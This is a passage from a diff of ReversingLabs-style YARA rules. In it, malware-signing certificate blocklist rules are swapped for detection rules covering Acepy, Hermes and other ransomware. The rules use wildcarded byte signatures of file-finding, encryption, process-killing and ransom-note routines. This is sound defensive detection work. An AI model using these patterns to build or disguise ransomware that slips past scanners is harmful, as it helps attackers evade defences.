?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? + ?? ?? ?? E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? + 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 + ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? + ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? + ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + E9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 84 C0 74 ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 + D2 48 C1 E2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 + E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 + } + $find_files_p2 = { + 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48 + 8D 85 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D + 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? + 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? C6 05 ?? + ?? ?? ?? ?? 48 8D 5D ?? 48 81 C3 ?? ?? ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? + 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 + C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? + ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 + C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C3 48 8D 85 ?? + ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DE EB ?? 48 89 C6 48 8D 5D ?? 48 81 C3 ?? ?? + ?? ?? 48 8D 45 ?? 48 39 C3 74 ?? 48 83 EB ?? 48 89 D9 E8 ?? ?? ?? ?? EB ?? 90 48 89 + F0 48 89 C1 E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? 5B 5E 5D C3 + } + $check_processes = { + 55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? EB ?? 8B 45 ?? 48 98 48 8D 14 C5 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 8B 1C 02 48 + 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 85 + C0 0F 95 C0 84 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? B8 + ?? ?? ?? ?? 48 83 C4 ?? 5B 5D C3 + } + $kill_file_processes_p1 = { + 55 56 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? C6 85 ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F EF C0 + 0F 11 45 ?? F3 0F 6F 4D ?? 0F 11 8D ?? ?? ?? ?? F3 0F 6F 55 ?? 0F 11 95 ?? ?? ?? ?? + F3 0F 6F 5D ?? 0F 11 9D ?? ?? ?? ?? F3 0F 6F 65 ?? 0F 11 A5 ?? ?? ?? ?? 0F B7 45 ?? + 66 89 85 ?? ?? 00 00 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? + ?? 48 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 41 B9 + ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 + 84 C0 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C + 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 41 B9 ?? + ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? + 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 C0 48 69 F0 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF + D0 49 89 F0 BA ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ?? + 48 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? + E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C 8B 8D ?? ?? + ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 + } + $kill_file_processes_p2 = { + 89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? + 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? + 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? + ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 + 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 + 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 8B 00 39 85 ?? ?? ?? ?? 75 ?? + 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 48 + 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 + 8B 00 41 89 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? + ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 85 ?? ?? ?? ?? + 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? + ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 + 8D 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 + E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 48 63 C8 48 8D 45 ?? 48 8D 55 + ?? 49 C7 C1 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? + ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "The Motivo Group, Inc." and pe.signatures[i].serial=="0f:9f:bd:ab:9b:39:64:5c:f3:21:1f:87:ab:b5:dd:b7" and 1361318399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($check_processes) and ( all of ($kill_file_processes_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4211D2E4F0E87127319302C55B85Bcf2 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Acepy : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Acepy ransomware." author = "ReversingLabs" - id = "dbe2a945-cf13-564a-a95a-24534c70a723" - date = "2023-11-08" - modified = "2023-11-08" + id = "3ffb45b1-6bde-5bf8-957e-433b9488ba91" + date = "2022-08-04" + modified = "2022-08-04" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L585-L601" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "edf9bbface7fe943dfa4f5a6e8469802ccdbd3de9d3e6b8fabebb024c21bb9a9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Acepy.yara#L1-L69" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "92c543a0b8c3c884f83647119d32c7b46f5fe839694bb8a8de0146c5c77bc587" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Acepy" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? + 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ?? + 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? + E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 + 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? + ?? ?? B8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files = { + 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? + 8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B + 45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2 + F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ?? + ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3 + } + $drop_ransom_note = { + 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? + ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? + ?? ?? C9 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "yinsheng xie" and pe.signatures[i].serial=="42:11:d2:e4:f0:e8:71:27:31:93:02:c5:5b:85:bc:f2" and 1360713599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($find_files) and ($encrypt_files) and ($drop_ransom_note)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_07B44Cdbfffb78De05F4261672A67312 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Hermes : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Hermes ransomware." author = "ReversingLabs" - id = "18787692-1233-5ea8-869c-feb530d06237" - date = "2023-11-08" - modified = "2023-11-08" + id = "1f1f363a-5be0-59e5-b1c1-5e277922790c" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L603-L619" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c88a8543782fc49d8aa68f3fc8052bd3316d10118dfb2ef2eef5006de657b6f1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Hermes.yara#L1-L284" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6db95c422ee2f9dd8a1795031ee8d7d5ed84e16cde47512becc006b6a849e890" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Hermes" + tc_detection_factor = 5 importance = 25 + strings: + $hermes_find_files_v1_p1 = { + A5 A5 A5 8D BD ?? ?? ?? ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 66 A5 68 ?? + ?? ?? ?? 8D BD ?? ?? ?? ?? 50 AB 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 65 + ?? ?? 8B 5D ?? 8B FB 4F 4F 8D 47 ?? 66 8B 4F ?? 47 47 66 85 C9 75 ?? BE ?? ?? ?? ?? + A5 A5 8D 8D ?? ?? ?? ?? 51 50 66 A5 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? E8 + ?? ?? ?? ?? 59 59 8B C8 E8 ?? ?? ?? ?? 8B CB 8B D0 E8 ?? ?? ?? ?? 2B C2 33 C9 83 7D + ?? ?? 66 89 0C 43 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? + 8B C1 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? + 8B C1 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 33 + } + $hermes_find_files_v1_p2 = { + C0 6A ?? 59 6A ?? 8D 7D ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 59 BE ?? ?? + ?? ?? 8D BD ?? ?? ?? ?? F3 A5 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 6A ?? 59 8D 7D ?? + AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? AB AB 66 AB BE ?? ?? ?? + ?? 8D 7D ?? A5 A5 A5 A5 33 C0 6A ?? 8D 7D ?? AB 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? + F3 A5 66 A5 8D BD ?? ?? ?? ?? AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 8D BD + ?? ?? ?? ?? AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 + C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 + 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 + 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D + 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 + 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 0F + } + $hermes_find_files_v1_p3 = { + 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 + 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F + 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F + 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D + } + $hermes_find_files_v1_p4 = { + 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 + ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? F6 85 + ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 F8 ?? 7E ?? 53 FF 75 + ?? FF 75 ?? E8 + } + $hermes_encrypt_files_v1_p1 = { + 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 3B C3 74 ?? 53 + FF 75 ?? FF 15 ?? ?? ?? ?? 33 F6 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? + ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 50 FF 15 ?? ?? ?? ?? 89 45 ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 56 89 45 ?? 8D 45 ?? 50 56 56 + 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? BF ?? ?? ?? ?? 57 FF 75 ?? 56 + FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 74 ?? 56 8D 4D ?? 51 FF 75 ?? 89 75 ?? 50 FF 75 ?? + FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 8B 4D ?? 8D 44 08 ?? 80 38 ?? 75 ?? 80 78 ?? + ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? 80 78 ?? ?? 75 ?? FF + 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B + } + $hermes_encrypt_files_v1_p2 = { + C9 C3 FF 75 ?? 8D 45 ?? 50 51 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 + 56 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? + ?? 6A ?? 57 FF 75 ?? 88 45 ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 3B FE 74 ?? FF 75 + ?? 0F BE 45 ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? 57 FF + 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 56 FF 75 ?? FF 15 + ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 53 6A ?? 56 56 68 ?? ?? ?? ?? FF 75 ?? FF + 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 FF 75 ?? 89 75 ?? FF 75 + ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? + 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 57 56 FF + 75 ?? FF 15 ?? ?? ?? ?? 33 C0 40 E9 + } + $hermes_enum_resources_v1 = { + 55 8B EC 83 EC ?? 53 56 57 8D 45 ?? 50 FF 75 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A + ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF + 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? FF 75 ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 45 ?? 50 53 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B + 43 ?? 66 83 38 ?? 8D 48 ?? 75 ?? 66 83 78 ?? ?? 75 ?? 6A ?? 51 E8 ?? ?? ?? ?? 59 59 + 85 C0 74 ?? 8B 43 ?? 8B D0 66 8B 08 40 40 66 85 C9 75 ?? 8B 7D ?? 2B C2 4F 4F 66 8B + 4F ?? 47 47 66 85 C9 75 ?? 8B C8 C1 E9 ?? 8B F2 F3 A5 8B C8 83 E1 ?? F3 A4 8B 7D ?? + 4F 4F 66 8B 47 ?? 47 47 66 85 C0 75 ?? BE ?? ?? ?? ?? A5 8B 43 ?? 83 E0 ?? 3C ?? 0F + 85 ?? ?? ?? ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 33 C0 5F 5E + 5B C9 C3 33 C0 40 EB + } + $hermes_encrypt_files_v2_p1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 33 C0 8D BD ?? ?? ?? ?? AB 33 DB 89 5D ?? AB AB + AB 8B 7D ?? 57 FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 53 56 6A ?? + 53 53 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 53 FF 15 ?? ?? ?? ?? 33 